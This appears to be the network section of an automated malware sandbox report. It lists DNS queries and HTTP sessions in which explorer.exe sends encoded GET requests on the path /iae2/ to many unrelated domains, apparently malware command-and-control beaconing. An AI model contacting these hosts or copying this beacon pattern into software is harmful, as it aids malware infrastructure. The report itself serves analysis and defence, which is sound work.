                                                                                  Feb 25, 2021 15:49:03.357830048 CET53607788.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:03.946949005 CET5379953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:04.016402960 CET53537998.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:04.376604080 CET5468353192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:04.437767029 CET53546838.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:09.219691992 CET5932953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:09.287708998 CET53593298.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:19.691899061 CET6402153192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:19.753674984 CET53640218.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:24.866559982 CET5612953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:24.948209047 CET53561298.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:30.146625996 CET5817753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:30.207983017 CET53581778.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:35.434107065 CET5070053192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:35.499968052 CET53507008.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:35.889400959 CET5406953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:35.938209057 CET53540698.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:36.327652931 CET6117853192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:36.390299082 CET53611788.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:39.989490986 CET5701753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:40.050118923 CET53570178.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:40.912452936 CET5632753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:41.069926023 CET53563278.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:46.365708113 CET5024353192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:46.569489002 CET53502438.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:52.304527044 CET6205553192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:52.389069080 CET53620558.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:56.194372892 CET6124953192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:56.245948076 CET53612498.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:49:57.400661945 CET6525253192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:49:57.477340937 CET53652528.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:50:03.101954937 CET6436753192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:50:03.171494007 CET53643678.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:50:08.698961973 CET5506653192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:50:08.828957081 CET53550668.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:50:13.846144915 CET6021153192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:50:13.916348934 CET53602118.8.8.8192.168.2.6
                                                                                  Feb 25, 2021 15:50:19.111793041 CET5657053192.168.2.68.8.8.8
                                                                                  Feb 25, 2021 15:50:19.287266016 CET53565708.8.8.8192.168.2.6

                                                                                  DNS Queries

                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                  Feb 25, 2021 15:48:24.826545954 CET192.168.2.68.8.8.80x181eStandard query (0)doc-0k-78-docs.googleusercontent.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:03.946949005 CET192.168.2.68.8.8.80x882aStandard query (0)www.guidedcommercialloan.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:09.219691992 CET192.168.2.68.8.8.80x5d63Standard query (0)www.discbrakepart.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:19.691899061 CET192.168.2.68.8.8.80x6b98Standard query (0)www.truckrev.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:24.866559982 CET192.168.2.68.8.8.80x6bbeStandard query (0)www.quartiercreole.netA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:30.146625996 CET192.168.2.68.8.8.80x196Standard query (0)www.wissinkadams.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:35.434107065 CET192.168.2.68.8.8.80x1504Standard query (0)www.shopping-container.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:40.912452936 CET192.168.2.68.8.8.80xe863Standard query (0)www.azhello.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:46.365708113 CET192.168.2.68.8.8.80x3499Standard query (0)www.africabiocity.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:52.304527044 CET192.168.2.68.8.8.80x409fStandard query (0)www.weebflix.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:57.400661945 CET192.168.2.68.8.8.80x946cStandard query (0)www.nhadat9chu.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:03.101954937 CET192.168.2.68.8.8.80x237bStandard query (0)www.kfs.ltdA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:08.698961973 CET192.168.2.68.8.8.80x2f27Standard query (0)www.prepa-tests.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:13.846144915 CET192.168.2.68.8.8.80xf88Standard query (0)www.lvlyourlife.comA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:19.111793041 CET192.168.2.68.8.8.80xcc85Standard query (0)www.angelises.comA (IP address)IN (0x0001)

                                                                                  DNS Answers

                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                  Feb 25, 2021 15:48:24.891527891 CET8.8.8.8192.168.2.60x181eNo error (0)doc-0k-78-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:48:24.891527891 CET8.8.8.8192.168.2.60x181eNo error (0)googlehosted.l.googleusercontent.com142.250.184.65A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:04.016402960 CET8.8.8.8192.168.2.60x882aNo error (0)www.guidedcommercialloan.comguidedcommercialloan.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:04.016402960 CET8.8.8.8192.168.2.60x882aNo error (0)guidedcommercialloan.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:09.287708998 CET8.8.8.8192.168.2.60x5d63No error (0)www.discbrakepart.comdiscbrakepart.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:09.287708998 CET8.8.8.8192.168.2.60x5d63No error (0)discbrakepart.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:19.753674984 CET8.8.8.8192.168.2.60x6b98No error (0)www.truckrev.comtruckrev.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:19.753674984 CET8.8.8.8192.168.2.60x6b98No error (0)truckrev.com160.153.136.3A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:24.948209047 CET8.8.8.8192.168.2.60x6bbeNo error (0)www.quartiercreole.netquartiercreole.netCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:24.948209047 CET8.8.8.8192.168.2.60x6bbeNo error (0)quartiercreole.net34.102.136.180A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:30.207983017 CET8.8.8.8192.168.2.60x196No error (0)www.wissinkadams.comwissinkadams.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:30.207983017 CET8.8.8.8192.168.2.60x196No error (0)wissinkadams.com34.98.99.30A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:35.499968052 CET8.8.8.8192.168.2.60x1504No error (0)www.shopping-container.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:35.499968052 CET8.8.8.8192.168.2.60x1504No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:35.499968052 CET8.8.8.8192.168.2.60x1504No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:35.499968052 CET8.8.8.8192.168.2.60x1504No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:35.499968052 CET8.8.8.8192.168.2.60x1504No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:35.499968052 CET8.8.8.8192.168.2.60x1504No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:35.499968052 CET8.8.8.8192.168.2.60x1504No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:35.499968052 CET8.8.8.8192.168.2.60x1504No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:41.069926023 CET8.8.8.8192.168.2.60xe863No error (0)www.azhello.comprod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:41.069926023 CET8.8.8.8192.168.2.60xe863No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com18.189.205.91A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:41.069926023 CET8.8.8.8192.168.2.60xe863No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.131.252.17A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:41.069926023 CET8.8.8.8192.168.2.60xe863No error (0)prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com3.138.83.135A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:46.569489002 CET8.8.8.8192.168.2.60x3499No error (0)www.africabiocity.comafricabiocity.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:46.569489002 CET8.8.8.8192.168.2.60x3499No error (0)africabiocity.com199.79.62.169A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:52.389069080 CET8.8.8.8192.168.2.60x409fName error (3)www.weebflix.comnonenoneA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:49:57.477340937 CET8.8.8.8192.168.2.60x946cNo error (0)www.nhadat9chu.com103.28.36.171A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:03.171494007 CET8.8.8.8192.168.2.60x237bNo error (0)www.kfs.ltdwww22.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:03.171494007 CET8.8.8.8192.168.2.60x237bNo error (0)www22.wixdns.netbalancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:03.171494007 CET8.8.8.8192.168.2.60x237bNo error (0)balancer.wixdns.net5f36b111-balancer.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:03.171494007 CET8.8.8.8192.168.2.60x237bNo error (0)5f36b111-balancer.wixdns.nettd-balancer-dc11-60-102.wixdns.netCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:03.171494007 CET8.8.8.8192.168.2.60x237bNo error (0)td-balancer-dc11-60-102.wixdns.net185.230.60.102A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:08.828957081 CET8.8.8.8192.168.2.60x2f27Server failure (2)www.prepa-tests.comnonenoneA (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:13.916348934 CET8.8.8.8192.168.2.60xf88No error (0)www.lvlyourlife.comlvlyourlife.comCNAME (Canonical name)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:13.916348934 CET8.8.8.8192.168.2.60xf88No error (0)lvlyourlife.com34.102.136.180A (IP address)IN (0x0001)
                                                                                  Feb 25, 2021 15:50:19.287266016 CET8.8.8.8192.168.2.60xcc85No error (0)www.angelises.com162.210.102.231A (IP address)IN (0x0001)

                                                                                  HTTP Request Dependency Graph

                                                                                  • www.guidedcommercialloan.com
                                                                                  • www.discbrakepart.com
                                                                                  • www.truckrev.com
                                                                                  • www.quartiercreole.net
                                                                                  • www.wissinkadams.com
                                                                                  • www.shopping-container.com
                                                                                  • www.azhello.com
                                                                                  • www.africabiocity.com
                                                                                  • www.nhadat9chu.com
                                                                                  • www.kfs.ltd
                                                                                  • www.lvlyourlife.com

                                                                                  HTTP Packets

                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  0192.168.2.64974334.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:49:04.064583063 CET2525OUTGET /iae2/?Cb=Rufvx1jOsytop1bvq44D8J5BrA1Sf94ZUOtMBwRkz2TXMocihNedTu7uPJah09VVn9/XRzeeTw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.guidedcommercialloan.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:49:04.204483986 CET2525INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Thu, 25 Feb 2021 14:49:04 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "60363547-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  1192.168.2.64974934.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:49:09.333920002 CET6438OUTGET /iae2/?Cb=e6cahffjztzcamJ4O+DKrhaQB5hRPzkwIvwlBHpDvSFa4AI+euUXko8WJypl60YQUdNY72tcfQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.discbrakepart.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:49:09.474284887 CET6438INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Thu, 25 Feb 2021 14:49:09 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "603155b8-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  10192.168.2.64976434.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:50:13.958388090 CET6509OUTGET /iae2/?Cb=AbpHtwwPcjqVDvg4bYXWsG8P5KsLAA+yhQvslNw16RaUmuaJNxrIVWhvxUk5BU5rJ318S0XyEg==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.lvlyourlife.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:50:14.098751068 CET6510INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Thu, 25 Feb 2021 14:50:14 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "60363547-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  2192.168.2.649750160.153.136.380C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:49:19.806034088 CET6463OUTGET /iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.truckrev.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:49:19.855556011 CET6463INHTTP/1.1 302 Found
                                                                                  Connection: close
                                                                                  Pragma: no-cache
                                                                                  cache-control: no-cache
                                                                                  Location: /iae2/?Cb=0/NeuyozxGBDMX4HAZN4yfkirUgQuZO/PqS7luZp/cW8TZEJ+m/Qgd9wiqPWKwH99MCiE7v8pw==&uVjH=yVCTVb0XT254cnY


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  3192.168.2.64975134.102.136.18080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:49:24.992497921 CET6464OUTGET /iae2/?Cb=y5UfgZt3axNXxKUKNxQBC2DBWQuEwdDoKwpextWmXL4AH1jfcUOFtuVQVuhxYhhogQppfaQ4MQ==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.quartiercreole.net
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:49:25.133006096 CET6464INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Thu, 25 Feb 2021 14:49:25 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "60363547-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  4192.168.2.64975234.98.99.3080C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:49:30.250901937 CET6465OUTGET /iae2/?Cb=zuFquqmMcvMIVTA8KC8hAytFTzaQhDtWEj5Y6a4mHxGfCyQF/Xb/aYQpFx1LlkGMT0GVZlYKNw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.wissinkadams.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:49:30.390222073 CET6466INHTTP/1.1 403 Forbidden
                                                                                  Server: openresty
                                                                                  Date: Thu, 25 Feb 2021 14:49:30 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 275
                                                                                  ETag: "603155b8-113"
                                                                                  Via: 1.1 google
                                                                                  Connection: close
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  5192.168.2.649753198.54.117.21180C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:49:35.694806099 CET6467OUTGET /iae2/?Cb=0E3C5mUHlRauL0/Y7Bp5k7qydJv7c0I2M1waktstgn1SsRqH7XaUeeB0rPzY/gY6TfHCuVFaFw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.shopping-container.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  6192.168.2.64975918.189.205.9180C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:49:41.207811117 CET6492OUTGET /iae2/?Cb=VoDnAKif46zuoDGUOYPF8CFht3P91IwI50ppSsuc6FjbQwYrNosv2kcASbfxHajA03pQPAi11g==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.azhello.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:49:41.344544888 CET6493INHTTP/1.1 404 Not Found
                                                                                  Date: Thu, 25 Feb 2021 14:49:41 GMT
                                                                                  Content-Type: text/html
                                                                                  Content-Length: 153
                                                                                  Connection: close
                                                                                  Server: nginx/1.16.1
                                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                  Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  7192.168.2.649760199.79.62.16980C:\Windows\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Feb 25, 2021 15:49:46.746673107 CET6495OUTGET /iae2/?Cb=M0uFvISRXYRHVkOb0AJBAd7B/InOE9ksckU2zFobX8RttE5IKM9SRPMAdsze42ip49A2WvKiMw==&uVjH=yVCTVb0XT254cnY HTTP/1.1
                                                                                  Host: www.africabiocity.com
                                                                                  Connection: close
                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                  Data Ascii:
                                                                                  Feb 25, 2021 15:49:47.960475922 CET6495INHTTP/1.1 301 Moved Permanently
